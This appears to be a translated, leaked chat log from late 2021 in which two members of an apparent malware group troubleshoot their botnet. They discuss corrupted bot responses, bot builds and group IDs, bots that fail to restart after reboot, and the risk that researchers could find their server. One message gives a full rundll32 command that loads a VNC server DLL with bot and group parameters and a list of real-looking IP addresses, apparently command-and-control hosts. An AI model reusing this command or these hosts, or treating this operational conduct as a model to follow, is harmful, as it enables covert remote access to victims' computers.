[02.11.21 09:56:24] angelo: hi
[02.11.21 09:56:36] angelo: I want to ask you a question outside the group.)
[02.11.21 09:58:29] angelo: hi
[02.11.21 09:58:54] angelo: go away
[02.11.21 09:59:02] angelo: what do you mean he can't spar ?
[02.11.21 09:59:13] angelo: i'm ashamed to ask such things in front of everyone.
[02.11.21 10:00:32] alphonse: the answer should be: pid=8888&msg=blablabla but it could have been corrupted by the procla
[02.11.21 10:03:41] alphonse: or there's something wrong with the key.
[02.11.21 10:04:33] angelo: shit, where should I look
[02.11.21 10:04:33] angelo: what can I do
[02.11.21 10:05:25] alphonse: can you catch the bot?
[02.11.21 10:06:09] angelo: how? i only see commands and their responses
[02.11.21 10:06:16] angelo: not really understood your question
[02.11.21 10:06:32] angelo: just run on bot was 3 times and all three times the answer was OK
[02.11.21 10:06:39] alphonse: ...you are a tester, not a coder
[02.11.21 10:06:54] angelo: yeah
[02.11.21 10:07:22] angelo: but I'm expected to solve the problem... but in this situation, at most I'll check my procs
[02.11.21 10:08:29] alphonse: is your bot build tuned to the new randle command?
[02.11.21 10:09:39] angelo: since group 19 yesterday there were runs on a new command
[02.11.21 10:09:50] angelo: checked, no problems
[02.11.21 10:10:04] angelo: let me check again
[02.11.21 10:21:12] alphonse: send me the command line for vnts
[02.11.21 10:24:40] alphonse: Result: OK
pid: 296I ran your command on the test one
[02.11.21 10:24:41] alphonse: only the dll file is different
[02.11.21 10:25:48] angelo: rundll rundll32 0 VNCSRV_82837_1.dll DllRegisterServer --id %id% --group %group% --ip 87.120.8.190,158.69133.70,185.106.120.99,45.14.226.195,103.124.106.154,149.3.170.201,5.181.80.103,89.41.182.242,172.83.155.186,45.42.201.179,194.15.112.223
[02.11.21 10:26:21] angelo: there's a bug somewhere
[02.11.21 12:59:07] angelo: I'm here for you
[02.11.21 12:59:10] angelo: like a pro
[02.11.21 12:59:26] angelo: mont said bot die after reboot
[02.11.21 12:59:48] angelo: i.e. after reboot bot does not wake up
[02.11.21 13:00:22] alphonse: probably give anchor command, but better ask colin
[03.11.21 12:21:02] alphonse: by the bottle explorers can find our server
[03.11.21 12:21:40] angelo: have time to describe how
[03.11.21 12:23:55] alphonse: if they poke into the server with their browser, they will get a bottle anyway. unlikely, but still
[03.11.21 12:24:46] angelo: got it, thought it would be more trivial
[30.12.21 17:42:15] angelo: hey bro
[12/30/21 17:47:49] angelo: hello!)
[30.12.21 17:48:05] angelo: write to general
[30.12.21 17:48:10] angelo: already there's a ruckus.)
